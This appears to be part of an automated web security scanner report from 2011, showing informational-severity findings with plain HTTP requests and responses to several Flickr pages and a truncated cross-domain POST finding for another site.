                                       <a href="/"><img src="http://l.yimg.com/g/images/en-us/flickr-yahoo-logo.png.v3" id="FlickrLogo" width="180" height="30" alt="Flickr logo. If you click it, you'll go home"></a>
                   
   
               </td>
           <td class="Status">
           

                   You aren't signed in
               &nbsp;&nbsp;&nbsp;
               <a id="head-signin-link" href="/signin/" class="ywa-track" data-ywa-name="Sign in (top)">Sign In</a>
               &nbsp;&nbsp;
               <a href="/help/">Help</a>
               </td>
       </tr>
   </table>
   

   <table cellspacing="0" class="NavBar" border="0">
       <tr>
           <td class="Primary">
       

<div id="candy_nav_button_bar" class="candy_button_bar clearfix">
   <ul class="site_nav_menu_buttons" role="navigation">

       <li class="no_menu_li first_menu_li"><span><a href="/">Home</a></span></li>
               
       
       <li class="no_menu_li"><span><a href="/tour/" alt="Take the Flickr tour" data-ywa-name="Tour">The Tour</a></span></li>
       
       <li class="no_menu_li"><span><a href="/signup/" alt="Sign Up for a Free Account" class="ywa-track" id="head-sign-up" data-ywa-name="Sign up (top)">Sign Up</a></span></li>



       <li class="menu_li" id="candy_nav_button_explore" data-ywa-name="Explore"><span><a href="/explore/" alt="Explore Flickr">Explore</a> <img src="http://l.yimg.com/g/images/site_nav_caret_split_default.png" class="nav_button_caret" width="18" height="15" alt="More options"></span>
       <div class="candy_menu" id="candy_nav_menu_explore">
           <a href="/explore/">Explore Page</a>
           <a href="/explore/interesting/7days/">Last 7 Days Interesting</a>
           <a href="/photos/tags/">Popular Tags</a>
           <a href="/explore/interesting/2011/06/">Calendar</a>
           <a href="/photos/">Most Recent Uploads</a>
           <a hr
...[SNIP]...

Request 2

GET /about/ HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n; fl_v=souhp; localization=en-us%3Bus%3Bus

Response 2

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:23:35 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 13-Jun-2014 00:23:35 GMT; path=/; domain=.flickr.com
X-Served-By: www126.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Via: HTTP/1.1 r10.ycpi.ne1.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r24.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 70222

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-us">
<head>

   <title>About Flickr</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <meta na
...[SNIP]...
<img src="http://geo.yahoo.com/f?s=792600056&t=9a998586600dd80cbfe630a25a041bf1&fl_ev=0&lang=en&intl=us" width="0" height="0" alt="" /></div>

<a name="top"></a>







<div class="TopBar TopBarWide" id="TopBar" role="banner">
   <table cellspacing="0" class="Header" border="0">
       <tr>
           <td class="FlickrLogo">
                                       <a href="/"><img src="http://l.yimg.com/g/images/en-us/flickr-yahoo-logo.png.v3" id="FlickrLogo" width="180" height="30" alt="Flickr logo. If you click it, you'll go home"></a>
                   
   
               </td>
           <td class="Status">
           

                   You aren't signed in
               &nbsp;&nbsp;&nbsp;
               <a id="head-signin-link" href="/signin/" class="ywa-track" data-ywa-name="Sign in (top)">Sign In</a>
               &nbsp;&nbsp;
               <a href="/help/">Help</a>
               </td>
       </tr>
   </table>
   

   <table cellspacing="0" class="NavBar" border="0">
       <tr>
           <td class="Primary">
       

<div id="candy_nav_button_bar" class="candy_button_bar clearfix">
   <ul class="site_nav_menu_buttons" role="navigation">

       <li class="no_menu_li first_menu_li"><span><a href="/">Home</a></span></li>
               
       
       <li class="no_menu_li"><span><a href="/tour/" alt="Take the Flickr tour" data-ywa-name="Tour">The Tour</a></span></li>
       
       <li class="no_menu_li"><span><a href="/signup/" alt="Sign Up for a Free Account" class="ywa-track" id="head-sign-up" data-ywa-name="Sign up (top)">Sign Up</a></span></li>



       <li class="menu_li" id="candy_nav_button_explore" data-ywa-name="Explore"><span><a href="/explore/" alt="Explore Flickr">Explore</a> <img src="http://l.yimg.com/g/images/site_nav_caret_split_default.png" class="nav_button_caret" width="18" height="15" alt="More options"></span>
       <div class="candy_menu" id="candy_nav_menu_explore">
           <a href="/explore/">Explore Page</a>
           <a href="/explore/interesting/7days/">Last 7 Days Interesting</a>
           <a href="/photos/tags/">Popular Tags</a>
           <a href="/explore/interesting/2011/06/">Calendar</a>
           <a href="/photos/">Most Recent Uploads</a>
           <a href="/explore/video/">Video on Fli
...[SNIP]...
15.6. http://www.flickr.com/abuse/  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.flickr.com
Path:   /abuse/

Request 1

POST /abuse/ HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.flickr.com/report_abuse.gne
Content-Length: 66
Cache-Control: max-age=0
Origin: http://www.flickr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n; fl_v=souhp; localization=en-us%3Bus%3Bus

goback=http%3A%2F%2Fwww.flickr.com%2Fabout%2F&abusecat=abuse_other

Response 1

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:24:44 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 13-Jun-2014 00:24:44 GMT; path=/; domain=.flickr.com
X-Served-By: www69.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Via: HTTP/1.1 r11.ycpi.mud.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r20.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 56237

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-us">
<head>

   <title>Flickr: Report Abuse</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   
...[SNIP]...
<img src="http://geo.yahoo.com/f?s=792600122&t=6e97ddbe3da7f40b900c7411df998a17&r=http%3A%2F%2Fwww.flickr.com%2Freport_abuse.gne&fl_ev=0&lang=en&intl=us" width="0" height="0" alt="" /></div>

<a name="top"></a>







<div class="TopBar TopBarWide" id="TopBar" role="banner">
   <table cellspacing="0" class="Header" border="0">
       <tr>
           <td class="FlickrLogo">
                                       <a href="/"><img src="http://l.yimg.com/g/images/en-us/flickr-yahoo-logo.png.v3" id="FlickrLogo" width="180" height="30" alt="Flickr logo. If you click it, you'll go home"></a>
                   
   
               </td>
           <td class="Status">
           

                   You aren't signed in
               &nbsp;&nbsp;&nbsp;
               <a id="head-signin-link" href="/signin/" class="ywa-track" data-ywa-name="Sign in (top)">Sign In</a>
               &nbsp;&nbsp;
               <a href="/help/">Help</a>
               </td>
       </tr>
   </table>
   

   <table cellspacing="0" class="NavBar" border="0">
       <tr>
           <td class="Primary">
       

<div id="candy_nav_button_bar" class="candy_button_bar clearfix">
   <ul class="site_nav_menu_buttons" role="navigation">

       <li class="no_menu_li first_menu_li"><span><a href="/">Home</a></span></li>
               
       
       <li class="no_menu_li"><span><a href="/tour/" alt="Take the Flickr tour" data-ywa-name="Tour">The Tour</a></span></li>
       
       <li class="no_menu_li"><span><a href="/signup/" alt="Sign Up for a Free Account" class="ywa-track" id="head-sign-up" data-ywa-name="Sign up (top)">Sign Up</a></span></li>



       <li class="menu_li" id="candy_nav_button_explore" data-ywa-name="Explore"><span><a href="/explore/" alt="Explore Flickr">Explore</a> <img src="http://l.yimg.com/g/images/site_nav_caret_split_default.png" class="nav_button_caret" width="18" height="15" alt="More options"></span>
       <div class="candy_menu" id="candy_nav_menu_explore">
           <a href="/explore/">Explore Page</a>
           <a href="/explore/interesting/7days/">Last 7 Days Interesting</a>
           <a href="/photos/tags/">Popular Tags</a>
           <a href="/explore/interesting/2011/06/">Calendar</a>
           <a href="/photos/">Most Recent Upl
...[SNIP]...

Request 2

POST /abuse/ HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Content-Length: 66
Cache-Control: max-age=0
Origin: http://www.flickr.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n; fl_v=souhp; localization=en-us%3Bus%3Bus

goback=http%3A%2F%2Fwww.flickr.com%2Fabout%2F&abusecat=abuse_other

Response 2

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:24:51 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 13-Jun-2014 00:24:51 GMT; path=/; domain=.flickr.com
X-Served-By: www98.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Via: HTTP/1.1 r16.ycpi.mud.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r20.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 56188

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-us">
<head>

   <title>Flickr: Report Abuse</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   
...[SNIP]...
<img src="http://geo.yahoo.com/f?s=792600122&t=34d32fc6b2311c3a8c0080f217ea29d8&fl_ev=0&lang=en&intl=us" width="0" height="0" alt="" /></div>

<a name="top"></a>







<div class="TopBar TopBarWide" id="TopBar" role="banner">
   <table cellspacing="0" class="Header" border="0">
       <tr>
           <td class="FlickrLogo">
                                       <a href="/"><img src="http://l.yimg.com/g/images/en-us/flickr-yahoo-logo.png.v3" id="FlickrLogo" width="180" height="30" alt="Flickr logo. If you click it, you'll go home"></a>
                   
   
               </td>
           <td class="Status">
           

                   You aren't signed in
               &nbsp;&nbsp;&nbsp;
               <a id="head-signin-link" href="/signin/" class="ywa-track" data-ywa-name="Sign in (top)">Sign In</a>
               &nbsp;&nbsp;
               <a href="/help/">Help</a>
               </td>
       </tr>
   </table>
   

   <table cellspacing="0" class="NavBar" border="0">
       <tr>
           <td class="Primary">
       

<div id="candy_nav_button_bar" class="candy_button_bar clearfix">
   <ul class="site_nav_menu_buttons" role="navigation">

       <li class="no_menu_li first_menu_li"><span><a href="/">Home</a></span></li>
               
       
       <li class="no_menu_li"><span><a href="/tour/" alt="Take the Flickr tour" data-ywa-name="Tour">The Tour</a></span></li>
       
       <li class="no_menu_li"><span><a href="/signup/" alt="Sign Up for a Free Account" class="ywa-track" id="head-sign-up" data-ywa-name="Sign up (top)">Sign Up</a></span></li>



       <li class="menu_li" id="candy_nav_button_explore" data-ywa-name="Explore"><span><a href="/explore/" alt="Explore Flickr">Explore</a> <img src="http://l.yimg.com/g/images/site_nav_caret_split_default.png" class="nav_button_caret" width="18" height="15" alt="More options"></span>
       <div class="candy_menu" id="candy_nav_menu_explore">
           <a href="/explore/">Explore Page</a>
           <a href="/explore/interesting/7days/">Last 7 Days Interesting</a>
           <a href="/photos/tags/">Popular Tags</a>
           <a href="/explore/interesting/2011/06/">Calendar</a>
           <a href="/photos/">Most Recent Uploads</a>
           <a href="/explore/video/">Video on Fl
...[SNIP]...
15.7. http://www.flickr.com/apps/badge/badge_iframe.gne  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.flickr.com
Path:   /apps/badge/badge_iframe.gne

Request 1

GET /apps/badge/badge_iframe.gne?zg_bg_color=ffffff&zg_person_id=56984041%40N00 HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.yadvertisingblog.com/blog/2011/05/31/yahoo-launches-clear-ad-notice/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n

Response 1

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:21:17 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Served-By: www150.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 0
Via: HTTP/1.1 r09.ycpi.mud.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r14.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 3515


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<script type="text/javascript" src="http://l.yimg.com/g/javascript/fpi.js.v62
...[SNIP]...
<img src="http://geo.yahoo.com/p?s=792600103&t=62506aca6cbf096ebf1c3fc8f55f29cc&r=http%3A%2F%2Fwww.yadvertisingblog.com%2Fblog%2F2011%2F05%2F31%2Fyahoo-launches-clear-ad-notice%2F&fl_ev=0&lang=en&intl=us" width="0" height="0" alt="" /><script type="text/javascript">
var fl_host = 'www.flickr.com';

function _ok_for_swf(){
if (actualVersion<6) return false;
var ua = navigator.userAgent;
if (navigator.appVersion.toLowerCase().indexOf("mac") > 0) { // mac
       if (ua.indexOf('Gecko') == -1) return false;
} else { // windows or unix
       if (ua.indexOf("MSIE 5.6") > 0 || ua.indexOf("MSIE 5.5") > 0 || ua.indexOf("MSIE 6") > 0 || ua.indexOf("MSIE 7") > 0) {
            // IE 5.5+
       } else {
            if (ua.indexOf('Gecko') == -1) return false;
       }
}
return true;
}
       
var zg_nsid = '56984041@N00';
var zg_scope = '0';
var zg_favorites = '0';
var zg_tags = '';
var zg_tag_mode = 'all';
var zg_group_id = '';
var zg_text = '';
var zg_set_id = '';
var zg_context = '';

var zg_swapInterv = (zg_swapInterv == undefined) ? 3 : zg_swapInterv;
var zg_loadInterv = (zg_loadInterv == undefined) ? 120 : zg_loadInterv;
var zg_transition = (zg_transition == undefined) ? 'bigThenSmall' : zg_transition;

var zg_cols = (zg_cols == undefined) ? 3 : zg_cols;
var zg_rows = (zg_rows == undefined) ? 4 : zg_rows;
var zg_wh = (zg_wh == undefined) ? 37 : zg_wh;


var zg_fw = zg_cols*zg_wh+((zg_cols-1)*1); // border of one
var zg_fh = zg_rows*zg_wh+((zg_rows-1)*1); // border of one

var zg_bg_color = 'ffffff';
zg_bg_color = 'ffffff';
var zg_url = 'http://'+fl_host+'/apps/badge/flashbadge.swf?host=http://'+fl_host+'&bg_color='+zg_bg_color+'&cols='+zg_cols+'&rows='+zg_rows+'&wh='+zg_wh+'&swapInterv='+zg_swapInterv+'&loadInterv='+zg_loadInterv+'&transition='+zg_transition;
zg_url+= '&nsid='+zg_nsid;
zg_url+= '&scope='+zg_scope;
zg_url+= '&favorites='+zg_favorites;
zg_url+= '&tags='+zg_tags;
zg_url+= '&tag_mode='+zg_tag_mode;
zg_url+= '&group_id='+zg_group_id;
zg_url+= '&text='+zg_text;
zg_u
...[SNIP]...

Request 2

GET /apps/badge/badge_iframe.gne?zg_bg_color=ffffff&zg_person_id=56984041%40N00 HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n

Response 2

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:21:21 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
X-Served-By: www139.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Age: 0
Via: HTTP/1.1 r12.ycpi.mud.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r23.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 3415


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<script type="text/javascript" src="http://l.yimg.com/g/javascript/fpi.js.v62
...[SNIP]...
<img src="http://geo.yahoo.com/p?s=792600103&t=7acfa504d9bc9ba06a33d9c9d439e8df&fl_ev=0&lang=en&intl=us" width="0" height="0" alt="" /><script type="text/javascript">
var fl_host = 'www.flickr.com';

function _ok_for_swf(){
if (actualVersion<6) return false;
var ua = navigator.userAgent;
if (navigator.appVersion.toLowerCase().indexOf("mac") > 0) { // mac
       if (ua.indexOf('Gecko') == -1) return false;
} else { // windows or unix
       if (ua.indexOf("MSIE 5.6") > 0 || ua.indexOf("MSIE 5.5") > 0 || ua.indexOf("MSIE 6") > 0 || ua.indexOf("MSIE 7") > 0) {
            // IE 5.5+
       } else {
            if (ua.indexOf('Gecko') == -1) return false;
       }
}
return true;
}
       
var zg_nsid = '56984041@N00';
var zg_scope = '0';
var zg_favorites = '0';
var zg_tags = '';
var zg_tag_mode = 'all';
var zg_group_id = '';
var zg_text = '';
var zg_set_id = '';
var zg_context = '';

var zg_swapInterv = (zg_swapInterv == undefined) ? 3 : zg_swapInterv;
var zg_loadInterv = (zg_loadInterv == undefined) ? 120 : zg_loadInterv;
var zg_transition = (zg_transition == undefined) ? 'bigThenSmall' : zg_transition;

var zg_cols = (zg_cols == undefined) ? 3 : zg_cols;
var zg_rows = (zg_rows == undefined) ? 4 : zg_rows;
var zg_wh = (zg_wh == undefined) ? 37 : zg_wh;


var zg_fw = zg_cols*zg_wh+((zg_cols-1)*1); // border of one
var zg_fh = zg_rows*zg_wh+((zg_rows-1)*1); // border of one

var zg_bg_color = 'ffffff';
zg_bg_color = 'ffffff';
var zg_url = 'http://'+fl_host+'/apps/badge/flashbadge.swf?host=http://'+fl_host+'&bg_color='+zg_bg_color+'&cols='+zg_cols+'&rows='+zg_rows+'&wh='+zg_wh+'&swapInterv='+zg_swapInterv+'&loadInterv='+zg_loadInterv+'&transition='+zg_transition;
zg_url+= '&nsid='+zg_nsid;
zg_url+= '&scope='+zg_scope;
zg_url+= '&favorites='+zg_favorites;
zg_url+= '&tags='+zg_tags;
zg_url+= '&tag_mode='+zg_tag_mode;
zg_url+= '&group_id='+zg_group_id;
zg_url+= '&text='+zg_text;
zg_url+= '&set_id='+zg_set_id;
zg_url+= '&context='+zg_context;

zg_url+= '&v=62865';
zg_url+= '&mag
...[SNIP]...
15.8. http://www.flickr.com/report_abuse.gne  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.flickr.com
Path:   /report_abuse.gne

Request 1

GET /report_abuse.gne HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
Referer: http://www.flickr.com/about/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n; fl_v=souhp; localization=en-us%3Bus%3Bus

Response 1

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:23:44 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 13-Jun-2014 00:23:44 GMT; path=/; domain=.flickr.com
X-Served-By: www23.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Via: HTTP/1.1 r20.ycpi.ne1.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r13.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 53534

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-us">
<head>

   <title>Flickr: Report Abuse</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   
...[SNIP]...
<img src="http://geo.yahoo.com/f?s=792600122&t=e1bedfb6607cb3384fb2e1d7e56732d8&r=http%3A%2F%2Fwww.flickr.com%2Fabout%2F&fl_ev=0&lang=en&intl=us" width="0" height="0" alt="" /></div>

<a name="top"></a>







<div class="TopBar TopBarWide" id="TopBar" role="banner">
   <table cellspacing="0" class="Header" border="0">
       <tr>
           <td class="FlickrLogo">
                                       <a href="/"><img src="http://l.yimg.com/g/images/en-us/flickr-yahoo-logo.png.v3" id="FlickrLogo" width="180" height="30" alt="Flickr logo. If you click it, you'll go home"></a>
                   
   
               </td>
           <td class="Status">
           

                   You aren't signed in
               &nbsp;&nbsp;&nbsp;
               <a id="head-signin-link" href="/signin/" class="ywa-track" data-ywa-name="Sign in (top)">Sign In</a>
               &nbsp;&nbsp;
               <a href="/help/">Help</a>
               </td>
       </tr>
   </table>
   

   <table cellspacing="0" class="NavBar" border="0">
       <tr>
           <td class="Primary">
       

<div id="candy_nav_button_bar" class="candy_button_bar clearfix">
   <ul class="site_nav_menu_buttons" role="navigation">

       <li class="no_menu_li first_menu_li"><span><a href="/">Home</a></span></li>
               
       
       <li class="no_menu_li"><span><a href="/tour/" alt="Take the Flickr tour" data-ywa-name="Tour">The Tour</a></span></li>
       
       <li class="no_menu_li"><span><a href="/signup/" alt="Sign Up for a Free Account" class="ywa-track" id="head-sign-up" data-ywa-name="Sign up (top)">Sign Up</a></span></li>



       <li class="menu_li" id="candy_nav_button_explore" data-ywa-name="Explore"><span><a href="/explore/" alt="Explore Flickr">Explore</a> <img src="http://l.yimg.com/g/images/site_nav_caret_split_default.png" class="nav_button_caret" width="18" height="15" alt="More options"></span>
       <div class="candy_menu" id="candy_nav_menu_explore">
           <a href="/explore/">Explore Page</a>
           <a href="/explore/interesting/7days/">Last 7 Days Interesting</a>
           <a href="/photos/tags/">Popular Tags</a>
           <a href="/explore/interesting/2011/06/">Calendar</a>
           <a href="/photos/">Most Recent Uploads</a>
...[SNIP]...

Request 2

GET /report_abuse.gne HTTP/1.1
Host: www.flickr.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BX=1uvu3ch6t691c&b=3&s=5n; fl_v=souhp; localization=en-us%3Bus%3Bus

Response 2

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:23:49 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Fri, 13-Jun-2014 00:23:49 GMT; path=/; domain=.flickr.com
X-Served-By: www42.flickr.mud.yahoo.com
Cache-Control: private
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Via: HTTP/1.1 r15.ycpi.mud.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ]), HTTP/1.1 r14.ycpi.ac4.yahoo.net (YahooTrafficServer/1.20.0 [cMsSf ])
Server: YTS/1.20.0
Proxy-Connection: keep-alive
Content-Length: 53464

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<html lang="en-us">
<head>

   <title>Flickr: Report Abuse</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   
...[SNIP]...
<img src="http://geo.yahoo.com/f?s=792600122&t=a7db0c5d62f5939372550419266c5553&fl_ev=0&lang=en&intl=us" width="0" height="0" alt="" /></div>

<a name="top"></a>







<div class="TopBar TopBarWide" id="TopBar" role="banner">
   <table cellspacing="0" class="Header" border="0">
       <tr>
           <td class="FlickrLogo">
                                       <a href="/"><img src="http://l.yimg.com/g/images/en-us/flickr-yahoo-logo.png.v3" id="FlickrLogo" width="180" height="30" alt="Flickr logo. If you click it, you'll go home"></a>
                   
   
               </td>
           <td class="Status">
           

                   You aren't signed in
               &nbsp;&nbsp;&nbsp;
               <a id="head-signin-link" href="/signin/" class="ywa-track" data-ywa-name="Sign in (top)">Sign In</a>
               &nbsp;&nbsp;
               <a href="/help/">Help</a>
               </td>
       </tr>
   </table>
   

   <table cellspacing="0" class="NavBar" border="0">
       <tr>
           <td class="Primary">
       

<div id="candy_nav_button_bar" class="candy_button_bar clearfix">
   <ul class="site_nav_menu_buttons" role="navigation">

       <li class="no_menu_li first_menu_li"><span><a href="/">Home</a></span></li>
               
       
       <li class="no_menu_li"><span><a href="/tour/" alt="Take the Flickr tour" data-ywa-name="Tour">The Tour</a></span></li>
       
       <li class="no_menu_li"><span><a href="/signup/" alt="Sign Up for a Free Account" class="ywa-track" id="head-sign-up" data-ywa-name="Sign up (top)">Sign Up</a></span></li>



       <li class="menu_li" id="candy_nav_button_explore" data-ywa-name="Explore"><span><a href="/explore/" alt="Explore Flickr">Explore</a> <img src="http://l.yimg.com/g/images/site_nav_caret_split_default.png" class="nav_button_caret" width="18" height="15" alt="More options"></span>
       <div class="candy_menu" id="candy_nav_menu_explore">
           <a href="/explore/">Explore Page</a>
           <a href="/explore/interesting/7days/">Last 7 Days Interesting</a>
           <a href="/photos/tags/">Popular Tags</a>
           <a href="/explore/interesting/2011/06/">Calendar</a>
           <a href="/photos/">Most Recent Uploads</a>
           <a href="/explore/video/">Video on Fl
...[SNIP]...
16. Cross-domain POST  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.advantageip.com
Path:   /Contact.html

Issue detail

The page contains a form which POSTs data to the domain sitesupport.websitetonight.com. The form contains the following fields:

Issue background

The POSTing of data between domains does not necessarily constitute a security vulnerability. You should review the contents of the information that is being transmitted between domains, and determine whether the originating application should be trusting the receiving domain with this information.

Request

